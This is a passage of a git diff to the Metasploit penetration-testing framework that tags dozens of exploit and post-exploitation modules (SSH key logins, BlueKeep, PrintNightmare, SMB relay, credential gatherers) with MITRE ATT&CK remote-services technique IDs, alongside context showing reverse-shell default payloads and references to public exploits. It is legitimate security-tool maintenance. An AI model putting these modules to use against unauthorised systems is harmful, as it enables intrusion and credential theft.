'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb index 47cdebb13f..8eecf43867 100644 --- a/modules/exploits/linux/ssh/mercurial_ssh_exec.rb +++ b/modules/exploits/linux/ssh/mercurial_ssh_exec.rb @@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ [ 'CVE', '2017-9462' ], - ['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29'] + [ 'URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 30732a229f..c8739dbd2f 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -36,7 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => 'xistence ', # Discovery, Metasploit module 'License' => MSF_LICENSE, 'References' => [ - ['PACKETSTORM', '125755'] + ['PACKETSTORM', '125755'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2014-03-17', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb index 13ba188eb9..da03af4598 100644 --- a/modules/exploits/linux/ssh/solarwinds_lem_exec.rb +++ b/modules/exploits/linux/ssh/solarwinds_lem_exec.rb @@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2017-7722'], - ['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'] + ['URL', 'http://web.archive.org/web/20250221015511/https://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' diff --git a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb index 9bc3440168..359d62053c 100644 --- a/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb +++ b/modules/exploits/linux/ssh/ssh_erlangotp_rce.rb @@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2025-32433'], ['URL', 'https://x.com/Horizon3Attack/status/1912945580902334793'], ['URL', 'https://platformsecurity.com/blog/CVE-2025-32433-poc'], - ['URL', 'https://github.com/ProDefense/CVE-2025-32433'] + ['URL', 'https://github.com/ProDefense/CVE-2025-32433'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Platform' => ['linux', 'unix'], 'Arch' => [ARCH_CMD], diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index f6c12aa36b..770f162a9c 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2012-3579'], ['OSVDB', '85028'], ['BID', '55143'], - ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'] + ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index a9b3eefdff..5b6c212de6 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -36,6 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2016-7456' ], [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ], ], 'DisclosureDate' => '2016-12-20', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb index 64dedec97d..87c70c42f0 100644 --- a/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb @@ -71,6 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://github.com/sinsinology/CVE-2023-34039'], ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'], ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH], ], 'DisclosureDate' => '2023-08-29', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/telnet/netgear_telnetenable.rb b/modules/exploits/linux/telnet/netgear_telnetenable.rb index 110f9f47e1..a3fefa92e7 100644 --- a/modules/exploits/linux/telnet/netgear_telnetenable.rb +++ b/modules/exploits/linux/telnet/netgear_telnetenable.rb @@ -28,7 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'], ['URL', 'https://github.com/cyanitol/netgear-telenetenable'], - ['URL', 'https://github.com/insanid/netgear-telenetenable'] + ['URL', 'https://github.com/insanid/netgear-telenetenable'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2009-10-30', # Python PoC (TCP) 'License' => MSF_LICENSE, diff --git a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb index 3bf479a3de..9af284f72a 100644 --- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb +++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2024_21683.rb @@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2024-21683'], ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-95832'], ['URL', 'https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated'], - ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE'] + ['URL', 'https://github.com/W01fh4cker/CVE-2024-21683-RCE'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2024-05-21', 'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default, `confluence` on Linux by default. diff --git a/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb b/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb index 3b9c4da47e..50ba0d0e97 100644 --- a/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb +++ b/modules/exploits/multi/http/connectwise_screenconnect_rce_cve_2024_1709.rb @@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2024-1709'], # Auth bypass to create admin account. ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], # Auth Bypass PoC - ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] # Analysis of both CVEs + ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'], # Analysis of both CVEs + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2024-02-19', 'Platform' => %w[win linux unix], diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index f9602859ab..0d0623d4ab 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -35,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2011-0807'], - ['OSVDB', '71948'] + ['OSVDB', '71948'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => ['win', 'linux', 'java'], 'Targets' => [ diff --git a/modules/exploits/multi/http/orientdb_exec.rb b/modules/exploits/multi/http/orientdb_exec.rb index 13587a132d..f894530072 100644 --- a/modules/exploits/multi/http/orientdb_exec.rb +++ b/modules/exploits/multi/http/orientdb_exec.rb @@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2017-11467'], ['URL', 'https://blogs.securiteam.com/index.php/archives/3318'], ['URL', 'http://www.palada.net/index.php/2017/07/13/news-2112/'], - ['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017'] + ['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => %w{linux unix win}, 'Privileged' => false, diff --git a/modules/exploits/multi/http/splunk_mappy_exec.rb b/modules/exploits/multi/http/splunk_mappy_exec.rb index 9746025f40..4b89cc57dd 100644 --- a/modules/exploits/multi/http/splunk_mappy_exec.rb +++ b/modules/exploits/multi/http/splunk_mappy_exec.rb @@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'BID', '51061' ], [ 'CVE', '2011-4642' ], [ 'URL', 'http://www.splunk.com/view/SP-CAAAGMM' ], - [ 'URL', 'http://www.sec-1.com/blog/?p=233' ] + [ 'URL', 'http://www.sec-1.com/blog/?p=233' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Payload' => { 'Space' => 1024, diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 952f1230cc..791b77b1a3 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -57,7 +57,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'BID', '36954' ], # tomcat docs - [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ] + [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Platform' => %w{java linux win}, # others? 'Targets' => [ diff --git a/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb b/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb index a4d259e4a7..538d2cdb49 100644 --- a/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb +++ b/modules/exploits/multi/misc/bmc_server_automation_rscd_nsh_rce.rb @@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'], ['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'], ['CVE', '2016-1542'], - ['CVE', '2016-1543'] + ['CVE', '2016-1543'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2016-03-16', 'Privileged' => false, diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index 9b712a5219..7868e341e8 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote ), 'Author' => ['Spencer McIntyre', 'Brandon Knight'], 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'License' => MSF_LICENSE, 'Privileged' => true, diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb index 089a3bade8..28b21907fd 100644 --- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb +++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb @@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] ], 'References' => [ - [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'] + [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ] ], 'DisclosureDate' => '2015-07-10', 'DefaultTarget' => 0, diff --git a/modules/exploits/osx/http/remote_for_mac_rce.rb b/modules/exploits/osx/http/remote_for_mac_rce.rb index bf0cfed03f..fa082a92b5 100644 --- a/modules/exploits/osx/http/remote_for_mac_rce.rb +++ b/modules/exploits/osx/http/remote_for_mac_rce.rb @@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => ['Chokri Hammedi (@blue0x1)'], 'References' => [ ['CVE', '2025-34089'], - ['PACKETSTORM', '195347'] + ['PACKETSTORM', '195347'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2025-05-27', 'Platform' => ['unix', 'osx'], diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index 88f8fb932a..21ac02d289 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'CVE', '2007-0882' ], [ 'OSVDB', '31881'], [ 'BID', '22512' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ], ], 'Privileged' => false, 'Platform' => %w[solaris unix], diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 1dced18ec3..ba3fe5cb3f 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2001-0797'], ['OSVDB', '690'], ['BID', '5531'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES], ], 'Privileged' => false, 'Platform' => %w[solaris unix], diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 8e29a8e5df..521d55688b 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -33,7 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2012-5975'], ['EDB', '23082'], ['OSVDB', '88103'], - ['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12'] + ['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Payload' => { 'Compat' => diff --git a/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb b/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb index 3d0515a649..c8307a779f 100644 --- a/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb +++ b/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb @@ -61,7 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://github.com/cube0x0/CVE-2021-1675'], ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'], ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'], - ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'] + ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Notes' => { 'AKA' => [ 'PrintNightmare' ], diff --git a/modules/exploits/windows/http/nscp_authenticated_rce.rb b/modules/exploits/windows/http/nscp_authenticated_rce.rb index 7f36aeff45..c2af1caa32 100644 --- a/modules/exploits/windows/http/nscp_authenticated_rce.rb +++ b/modules/exploits/windows/http/nscp_authenticated_rce.rb @@ -30,7 +30,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2025-34079'], - ['EDB', '48360'] + ['EDB', '48360'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => %w[windows], 'Arch' => [ARCH_X64], diff --git a/modules/exploits/windows/imap/mercury_login.rb b/modules/exploits/windows/imap/mercury_login.rb index 419413893a..710e06b96e 100644 --- a/modules/exploits/windows/imap/mercury_login.rb +++ b/modules/exploits/windows/imap/mercury_login.rb @@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2007-1373'], - ['EDB', '3418'] + ['EDB', '3418'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Privileged' => true, 'DefaultOptions' => { diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb index e09a7fde86..b38bb899e7 100644 --- a/modules/exploits/windows/local/powershell_remoting.rb +++ b/modules/exploits/windows/local/powershell_remoting.rb @@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Local 'Author' => [ 'Ben Campbell' ], 'References' => [ [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) - [ 'OSVDB', '3106'] + [ 'OSVDB', '3106'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb index 61321d6a26..a97682ba5e 100644 --- a/modules/exploits/windows/local/wmi.rb +++ b/modules/exploits/windows/local/wmi.rb @@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Local [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'OSVDB', '3106'], [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', diff --git a/modules/exploits/windows/misc/unified_remote_rce.rb b/modules/exploits/windows/misc/unified_remote_rce.rb index 44d3e52e28..6c694585a9 100644 --- a/modules/exploits/windows/misc/unified_remote_rce.rb +++ b/modules/exploits/windows/misc/unified_remote_rce.rb @@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'EDB', '49587' ], [ 'URL', 'https://www.unifiedremote.com/' ], [ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ], - [ 'CVE', '2022-3229' ] + [ 'CVE', '2022-3229' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Arch' => [ ARCH_X64, ARCH_X86 ], 'Platform' => 'win', diff --git a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb index d5aedddd75..ea4eacaab0 100644 --- a/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb +++ b/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb @@ -95,7 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'], ['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html'], ['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER], - ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION] + ['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION], + ['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL] ], 'DefaultOptions' => { 'RDP_CLIENT_NAME' => 'ethdev', diff --git a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb index fd4bdc38ea..24dd343da3 100644 --- a/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb +++ b/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb @@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Spencer McIntyre' # RDP DOPU analysis ], 'References' => [ - ['URL', 'https://github.com/countercept/doublepulsar-detection-script'] + ['URL', 'https://github.com/countercept/doublepulsar-detection-script'], + ['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL] ], 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb b/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb index 883269a3d5..766ad263eb 100644 --- a/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb +++ b/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb @@ -44,7 +44,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ], [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ], [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ], - [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ] + [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', diff --git a/modules/exploits/windows/smb/ipass_pipe_exec.rb b/modules/exploits/windows/smb/ipass_pipe_exec.rb index 145b32662b..59bd0c806e 100644 --- a/modules/exploits/windows/smb/ipass_pipe_exec.rb +++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb @@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'OSVDB', '117423' ], [ 'BID', '72265' ], [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', diff --git a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb index a0d905fdb6..3526bea7bc 100644 --- a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb +++ b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb @@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], ['URL', 'https://github.com/countercept/doublepulsar-detection-script'], ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], - ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] + ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index cbb333fb02..c2dc694013 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -83,7 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote ['MSB', 'MS08-068'], ['URL', 'http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx'], ['URL', 'https://en.wikipedia.org/wiki/SMBRelay'], - ['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'] + ['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win', diff --git a/modules/exploits/windows/smb/smb_shadow.rb b/modules/exploits/windows/smb/smb_shadow.rb index 27f776a44c..c554def21d 100644 --- a/modules/exploits/windows/smb/smb_shadow.rb +++ b/modules/exploits/windows/smb/smb_shadow.rb @@ -38,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => {}, 'References' => [ - ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'] + ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win', diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb index 2842e36820..5e0ac8626a 100644 --- a/modules/exploits/windows/ssh/freesshd_authbypass.rb +++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb @@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote ['OSVDB', '88006'], ['BID', '56785'], ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'], - ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'] + ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'Platform' => 'win', 'Privileged' => true, diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 6833d456d7..8df54ecc7d 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -28,6 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ], ], 'Privileged' => true, 'DefaultOptions' => { diff --git a/modules/post/linux/manage/sshkey_persistence.rb b/modules/post/linux/manage/sshkey_persistence.rb index d87ebacfc7..ea12d45c9a 100644 --- a/modules/post/linux/manage/sshkey_persistence.rb +++ b/modules/post/linux/manage/sshkey_persistence.rb @@ -37,7 +37,10 @@ class MetasploitModule < Msf::Post stdapi_fs_separator ] } - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] + ] ) ) diff --git a/modules/post/osx/gather/vnc_password_osx.rb b/modules/post/osx/gather/vnc_password_osx.rb index b78df4ad99..9a0b79e659 100644 --- a/modules/post/osx/gather/vnc_password_osx.rb +++ b/modules/post/osx/gather/vnc_password_osx.rb @@ -23,7 +23,10 @@ class MetasploitModule < Msf::Post 'Stability' => [CRASH_SAFE], 'SideEffects' => [], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ] + ] ) ) end diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 4e09ec5286..944a55ebf3 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -33,7 +33,12 @@ class MetasploitModule < Msf::Post 'Stability' => [CRASH_SAFE], 'SideEffects' => [], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] + ] ) ) end diff --git a/modules/post/windows/gather/credentials/rdc_manager_creds.rb b/modules/post/windows/gather/credentials/rdc_manager_creds.rb index da9b5ba7cc..e4fcc396c3 100644 --- a/modules/post/windows/gather/credentials/rdc_manager_creds.rb +++ b/modules/post/windows/gather/credentials/rdc_manager_creds.rb @@ -51,7 +51,10 